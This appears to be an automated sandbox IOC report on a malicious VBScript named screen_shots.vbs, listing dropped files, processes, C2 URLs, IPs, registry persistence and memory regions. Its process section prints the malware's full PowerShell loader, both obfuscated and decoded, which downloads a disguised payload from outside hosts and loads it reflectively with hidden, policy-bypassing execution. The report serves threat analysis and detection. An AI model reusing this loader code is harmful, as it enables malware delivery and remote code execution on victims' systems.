IOC Report
screen_shots.vbs

loading gif

Files

File Path
Type
Category
Malicious
screen_shots.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Name.vbs
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lgpufyb.bvz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aspmldpg.rhw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bycvimve.3kj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elfr1y0g.2xs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_krolwf45.ctp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmsckbxf.ryn.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\screen_shots.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwDgTre4DgTreDkDgTreMDgTreBhDgTreDgDgTreMgBiDgTreGQDgTreNgBkDgTreDkDgTreZgDgTretDgTreGIDgTreNgBmDgTreGEDgTreLQDgTre0DgTreDYDgTreOQDgTre0DgTreC0DgTreNQDgTrezDgTreDkDgTreMDgTreDgTretDgTreDYDgTreZgDgTre1DgTreGEDgTreNDgTreBiDgTreGQDgTreNDgTreDgTre9DgTreG4DgTreZQBrDgTreG8DgTredDgTreDgTremDgTreGEDgTreaQBkDgTreGUDgTrebQDgTre9DgTreHQDgTrebDgTreBhDgTreD8DgTredDgTreB4DgTreHQDgTreLgDgTrezDgTreDIDgTreMDgTreDgTreyDgTreDEDgTrebQByDgTreG8DgTredwB4DgTreG4DgTreaDgTreBvDgTreGoDgTreLwBvDgTreC8DgTrebQBvDgTreGMDgTreLgB0DgTreG8DgTrecDgTreBzDgTreHDgTreDgTrecDgTreBhDgTreC4DgTreNgDgTre0DgTreDDgTreDgTreMwDgTre4DgTreC0DgTrebQBlDgTreHQDgTrecwB5DgTreHMDgTreLQBlDgTreGMDgTreaQBvDgTreHYDgTrebgBpDgTreC8DgTreYgDgTrevDgTreDDgTreDgTredgDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecwBpDgTreHDgTreDgTreYQBlDgTreGwDgTreZwBvDgTreG8DgTreZwDgTreuDgTreGUDgTreZwBhDgTreHIDgTrebwB0DgTreHMDgTreZQBzDgTreGEDgTreYgBlDgTreHIDgTreaQBmDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('890a82bd6d9f-b6fa-4694-5390-6f5a4bd4=nekot&aidem=tla?txt.32021mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg
45.74.19.84
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://45.74.19.84
unknown
malicious
xwv5group7001.duckdns.org
malicious
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://go.microsoft.co
unknown
https://paste.ee/Iy
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://paste.ee/d/GoCAwP
unknown
https://contoso.com/License
unknown
https://paste.ee:443/d/GoCAw
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://paste.ee/d/GoCAw
172.67.187.200
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
http://paste.ee/d/GoCAw
172.67.187.200
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
There are 18 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
xwv5group7001.duckdns.org
163.172.59.233
malicious
paste.ee
172.67.187.200

IPs

IP
Domain
Country
Malicious
163.172.59.233
xwv5group7001.duckdns.org
United Kingdom
malicious
45.74.19.84
unknown
United States
malicious
172.67.187.200
paste.ee
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
28D1000
trusted library allocation
page read and write
malicious
29AACF17000
trusted library allocation
page read and write
243FC7DE000
heap
page read and write
29AAD6C6000
trusted library allocation
page read and write
2ECE7FC000
stack
page read and write
243FE5A3000
heap
page read and write
212AAD88000
heap
page read and write
790815E000
unkown
page read and write
1F550850000
heap
page read and write
2125F53B000
trusted library allocation
page read and write
1DE826F5000
heap
page read and write
2125D380000
heap
page read and write
29AAF3DE000
trusted library allocation
page read and write
29AAE7A8000
trusted library allocation
page read and write
1F5524EB000
heap
page read and write
1F5524D4000
heap
page read and write
29AAE288000
trusted library allocation
page read and write
29AAF3BA000
trusted library allocation
page read and write
1F55073E000
heap
page read and write
2650000
trusted library allocation
page read and write
29AADEC7000
trusted library allocation
page read and write
212ACE0C000
trusted library allocation
page read and write
1F5526CC000
heap
page read and write
1F5526CD000
heap
page read and write
29AAEF5E000
trusted library allocation
page read and write
29AACA6E000
trusted library allocation
page read and write
7FF848FA1000
trusted library allocation
page read and write
1F550690000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
1F5526CE000
heap
page read and write
29AADA66000
trusted library allocation
page read and write
29AAF29A000
trusted library allocation
page read and write
29AAEAC0000
trusted library allocation
page read and write
79086F9000
stack
page read and write
1DE805F9000
heap
page read and write
29AAEB57000
trusted library allocation
page read and write
2125D5B0000
trusted library allocation
page read and write
1DE82477000
heap
page read and write
29AADF38000
trusted library allocation
page read and write
243FC77E000
heap
page read and write
67FD000
stack
page read and write
29AAED8D000
trusted library allocation
page read and write
212AAFE0000
trusted library allocation
page read and write
29AAF23E000
trusted library allocation
page read and write
212C4EBA000
heap
page read and write
1DE81FE0000
heap
page read and write
2125FDDA000
trusted library allocation
page read and write
1DE805F4000
heap
page read and write
29AAE178000
trusted library allocation
page read and write
29AAC980000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
29AA82A6000
heap
page read and write
243FE72C000
heap
page read and write
29AADFDC000
trusted library allocation
page read and write
BFD80FD000
stack
page read and write
29AAF19E000
trusted library allocation
page read and write
29AAE6F8000
trusted library allocation
page read and write
29AAE6D8000
trusted library allocation
page read and write
1F5525D0000
heap
page read and write
29AA82BE000
heap
page read and write
2540000
trusted library allocation
page read and write
29AAD0C9000
trusted library allocation
page read and write
1DE82483000
heap
page read and write
29AAD856000
trusted library allocation
page read and write
212C50E0000
heap
page read and write
29AAF267000
trusted library allocation
page read and write
29AACF26000
trusted library allocation
page read and write
29AAC990000
trusted library allocation
page read and write
52EE000
stack
page read and write
29AAECDE000
trusted library allocation
page read and write
212AAF80000
heap
page read and write
29AAD586000
trusted library allocation
page read and write
29AAEDBD000
trusted library allocation
page read and write
29AAED35000
trusted library allocation
page read and write
29AAEC7D000
trusted library allocation
page read and write
29AAD06A000
trusted library allocation
page read and write
29AAE268000
trusted library allocation
page read and write
29AAE448000
trusted library allocation
page read and write
29AAE138000
trusted library allocation
page read and write
29AAD446000
trusted library allocation
page read and write
29AAD966000
trusted library allocation
page read and write
1F550733000
heap
page read and write
212C4EAF000
heap
page read and write
29AAEF3E000
trusted library allocation
page read and write
29AAED25000
trusted library allocation
page read and write
29AAE997000
trusted library allocation
page read and write
29AAE2B8000
trusted library allocation
page read and write
29AACFC6000
trusted library allocation
page read and write
1DE82482000
heap
page read and write
29AADAB6000
trusted library allocation
page read and write
29AAD194000
trusted library allocation
page read and write
29AAD486000
trusted library allocation
page read and write
29AAD1A4000
trusted library allocation
page read and write
29AAF156000
trusted library allocation
page read and write
29AADB46000
trusted library allocation
page read and write
1DE82550000
heap
page read and write
29AAD0D9000
trusted library allocation
page read and write
29AAA487000
trusted library allocation
page read and write
2125D3A3000
heap
page read and write
29AAE658000
trusted library allocation
page read and write
29AA9B60000
trusted library allocation
page read and write
29AADFD8000
trusted library allocation
page read and write
29AACD5F000
trusted library allocation
page read and write
29AA8130000
heap
page read and write
29AADDF6000
trusted library allocation
page read and write
29AAEE2E000
trusted library allocation
page read and write
7FF848E2B000
trusted library allocation
page read and write
1F550766000
heap
page read and write
29AAF00E000
trusted library allocation
page read and write
243FE3F1000
heap
page read and write
7FF848FAA000
trusted library allocation
page read and write
29AAD0E9000
trusted library allocation
page read and write
29AACABE000
trusted library allocation
page read and write
29AAE128000
trusted library allocation
page read and write
1DE807E5000
heap
page read and write
A90000
trusted library allocation
page read and write
243FC77F000
heap
page read and write
29AAD2E6000
trusted library allocation
page read and write
29AAEA62000
trusted library allocation
page read and write
29AAB92D000
trusted library allocation
page read and write
1F5524F7000
heap
page read and write
29AACADE000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
29AACF46000
trusted library allocation
page read and write
25CC000
stack
page read and write
29AADB76000
trusted library allocation
page read and write
29AA8360000
heap
page read and write
1F550763000
heap
page read and write
29AADF08000
trusted library allocation
page read and write
7FF848FCA000
trusted library allocation
page read and write
29AACDE9000
trusted library allocation
page read and write
5FBE000
stack
page read and write
1DE805D1000
heap
page read and write
4DFE000
trusted library allocation
page read and write
79081DE000
stack
page read and write
29AACB8C000
trusted library allocation
page read and write
243FE60E000
heap
page read and write
29AAEA81000
trusted library allocation
page read and write
29AADDA6000
trusted library allocation
page read and write
29AACD2A000
trusted library allocation
page read and write
29AAD616000
trusted library allocation
page read and write
29AAE0B8000
trusted library allocation
page read and write
5FC0000
heap
page read and write
2125D320000
heap
page read and write
29AAF006000
trusted library allocation
page read and write
29AAF296000
trusted library allocation
page read and write
243FE71B000
heap
page read and write
1DE8247B000
heap
page read and write
29ABB7AD000
trusted library allocation
page read and write
29AACF96000
trusted library allocation
page read and write
29AAF14E000
trusted library allocation
page read and write
29AACACE000
trusted library allocation
page read and write
29AACC7B000
trusted library allocation
page read and write
29AAF0DE000
trusted library allocation
page read and write
29AAF3FA000
trusted library allocation
page read and write
625D000
stack
page read and write
79080D3000
stack
page read and write
1F5506C6000
heap
page read and write
5270000
trusted library allocation
page execute and read and write
243FE5A3000
heap
page read and write
29AAD726000
trusted library allocation
page read and write
1DE805D4000
heap
page read and write
29AAECA5000
trusted library allocation
page read and write
29AAEA0A000
trusted library allocation
page read and write
29AAE548000
trusted library allocation
page read and write
29AAEF6E000
trusted library allocation
page read and write
29AA8244000
heap
page read and write
38D1000
trusted library allocation
page read and write
1DE80630000
heap
page read and write
29AAF17E000
trusted library allocation
page read and write
1DE805F9000
heap
page read and write
29AAE1E8000
trusted library allocation
page read and write
29AAC9AF000
trusted library allocation
page read and write
212AADC8000
heap
page read and write
29AAE6C8000
trusted library allocation
page read and write
1DE8250A000
heap
page read and write
29AAC940000
trusted library allocation
page read and write
4DEE000
stack
page read and write
29AADA56000
trusted library allocation
page read and write
1DE82459000
heap
page read and write
29AAEC8D000
trusted library allocation
page read and write
1DE805E7000
heap
page read and write
1F5506CD000
heap
page read and write
29AAF1DE000
trusted library allocation
page read and write
29AAD2A5000
trusted library allocation
page read and write
1F550761000
heap
page read and write
243FE599000
heap
page read and write
29AAD806000
trusted library allocation
page read and write
29AAEB4F000
trusted library allocation
page read and write
243FE74B000
heap
page read and write
29AAD916000
trusted library allocation
page read and write
1F55075E000
heap
page read and write
29AAA4C1000
trusted library allocation
page read and write
29AAD4C6000
trusted library allocation
page read and write
29AADE87000
trusted library allocation
page read and write
29AAEEAE000
trusted library allocation
page read and write
29AACB4D000
trusted library allocation
page read and write
79084FD000
stack
page read and write
BFD807E000
stack
page read and write
1DE805EE000
heap
page read and write
29AADBC6000
trusted library allocation
page read and write
1F550855000
heap
page read and write
1F5506C5000
heap
page read and write
29AACB1D000
trusted library allocation
page read and write
1F550859000
heap
page read and write
212AADE8000
heap
page read and write
29AAF41A000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
1F550760000
heap
page read and write
243FE883000
